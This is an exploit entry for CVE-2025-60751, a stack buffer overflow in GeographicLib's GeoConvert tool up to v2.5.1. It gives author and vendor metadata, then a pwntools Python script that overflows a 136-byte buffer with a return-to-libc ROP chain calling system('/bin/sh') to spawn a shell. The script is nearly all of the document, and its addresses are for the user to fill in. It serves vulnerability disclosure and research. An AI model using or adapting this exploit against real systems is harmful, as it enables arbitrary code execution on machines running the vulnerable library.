Exploit title: GeographicLib v2.5.1 - stack buffer overflow
Date of discovery: 20 August 2025
Exploit Author: Me zer0matt (Rosario Matteo Grammatico)
<https://github.com/zer0matt>
Vendor homepage: https://github.com/geographiclib/
Software link: https://github.com/geographiclib/geographiclib
Affected version: GeographicLib <= v2.5.1
Tested on: Kali Linux 6.12.25-amd64 (Virtual Machine)
CVE id: CVE-2025-60751
Github issue: https://github.com/geographiclib/geographiclib/issues/43
Exploit repository: https://github.com/zer0matt/CVE-2025-60751
Blog post: https://zer0matt.github.io/CVE-2025-60751/
from pwn import *
# --- INITIAL CONFIG ---
binary_path = "./GeoConvert"
elf = ELF(binary_path)
context.binary = elf
context.arch = 'amd64'
# --- REPLACE THE ADDRESSES WITH YOUR OWN ONES ---
pop_rdi = 0x000055555558BEFD
ret_gadget = 0x000055555558A016
system_addr = 0x7ffff7a5d110
binsh_addr = 0x7ffff7bb1ea4
exit_addr = 0x7ffff7a4c340
# --- PAYLOAD ---
offset = 136
payload = b"A" * offset
payload += p64(ret_gadget) # stack align
payload += p64(pop_rdi) # pop rdi; ret
payload += p64(binsh_addr) # "/bin/sh" address
payload += p64(system_addr) # system("/bin/sh")
payload += p64(exit_addr) # exit
io = process(binary_path, env={"ASAN_OPTIONS":"detect_stack_use_after_return=1"})
io.sendline(payload)
io.interactive()
